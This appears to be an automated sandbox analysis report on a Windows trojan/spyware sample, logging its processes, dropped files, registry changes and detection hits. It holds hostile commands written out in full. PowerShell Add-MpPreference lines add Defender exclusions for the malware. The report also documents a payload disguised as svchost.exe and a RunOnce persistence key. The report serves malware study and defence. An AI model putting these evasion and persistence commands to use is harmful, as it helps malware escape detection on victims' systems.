                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_078B6D78
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_078B9DC0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_078B4510
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_078B92B8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_078BA0B8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_078B0040
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeCode function: 17_2_05D12207
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeCode function: 17_2_05D128B8
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeCode function: 17_2_05D1AA4A
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 2300
                      Source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs lfQuSBwdSf.exe
                      Source: lfQuSBwdSf.exe, 00000000.00000002.343066638.00000000016B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs lfQuSBwdSf.exe
                      Source: lfQuSBwdSf.exe, 00000000.00000002.332211972.0000000000CBA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs lfQuSBwdSf.exe
                      Source: lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs lfQuSBwdSf.exe
                      Source: lfQuSBwdSf.exe, 00000000.00000003.233052710.0000000003358000.00000004.00000001.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs lfQuSBwdSf.exe
                      Source: lfQuSBwdSf.exe, 00000000.00000002.343141674.00000000016C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs lfQuSBwdSf.exe
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb,
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@49/25@11/5
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile created: C:\Users\user\WrdAHTtKmtDmucJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2788
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5224:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2120:120:WilError_01
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wacrv0pl.app.ps1Jump to behavior
                      Source: lfQuSBwdSf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: lfQuSBwdSf.exeVirustotal: Detection: 24%
                      Source: lfQuSBwdSf.exeReversingLabs: Detection: 29%
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile read: C:\Users\user\Desktop\lfQuSBwdSf.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\lfQuSBwdSf.exe 'C:\Users\user\Desktop\lfQuSBwdSf.exe'
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lfQuSBwdSf.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe'
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Users\user\Desktop\lfQuSBwdSf.exe C:\Users\user\Desktop\lfQuSBwdSf.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe'
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 2300
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lfQuSBwdSf.exe' -Force
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Users\user\Desktop\lfQuSBwdSf.exe C:\Users\user\Desktop\lfQuSBwdSf.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: lfQuSBwdSf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: lfQuSBwdSf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbOS source: lfQuSBwdSf.exe, 00000000.00000002.341939107.00000000013F2000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbs source: lfQuSBwdSf.exe, 00000000.00000002.341939107.00000000013F2000.00000004.00000020.sdmp
                      Source: Binary string: npAjVisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbs source: lfQuSBwdSf.exe, 00000000.00000002.341262404.00000000013C2000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: lfQuSBwdSf.exe, 00000000.00000002.340683009.0000000001392000.00000004.00000020.sdmp
                      Source: Binary string: (P6jLC:\Windows\Microsoft.VisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: lfQuSBwdSf.PDB source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb, source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: lfQuSBwdSf.exe, 00000000.00000002.341262404.00000000013C2000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\lfQuSBwdSf.PDB source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb1G source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: C:\Users\user\Desktop\lfQuSBwdSf.PDB source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.341262404.00000000013C2000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdby source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: .pdb%H source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp

                      Data Obfuscation:

                      barindex
                      Yara detected Beds ObfuscatorShow sources
                      Source: Yara matchFile source: 00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 23.2.svchost.exe.4a72390.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.svchost.exe.4ad53b0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.svchost.exe.4ad53b0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.49c8f18.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.4965ef8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.lfQuSBwdSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.4965ef8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.svchost.exe.4a72390.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.49c8f18.2.raw.unpack, type: UNPACKEDPE
                      Source: lfQuSBwdSf.exeStatic PE information: 0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                      Source: svchost.exe.0.drStatic PE information: real checksum: 0xc0d7 should be: 0xc7cf
                      Source: lfQuSBwdSf.exeStatic PE information: real checksum: 0xc0d7 should be: 0xc7cf
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07951752 pushad ; ret
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07952542 push esp; retf
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07951488 push eax; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0801D831 push eax; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08017A29 push eax; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_080116FA push eax; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07876EE8 pushad ; retf
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07877320 push esp; retf
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_078B12F8 push eax; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_078B7A28 push eax; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_078C2B0F push eax; mov dword ptr [esp], edx

                      Persistence and Installation Behavior:

                      barindex
                      Drops PE files with benign system namesShow sources
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile created: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeJump to dropped file
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: unknownExecutable created and started: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile created: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile created: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Creates an autostart registry key pointing to binary in C:\WindowsShow sources
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wyreCRIlnJump to behavior
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wyreCRIlnJump to behavior
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wyreCRIlnJump to behavior
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wyreCRIlnJump to behavior
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wyreCRIlnJump to behavior
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
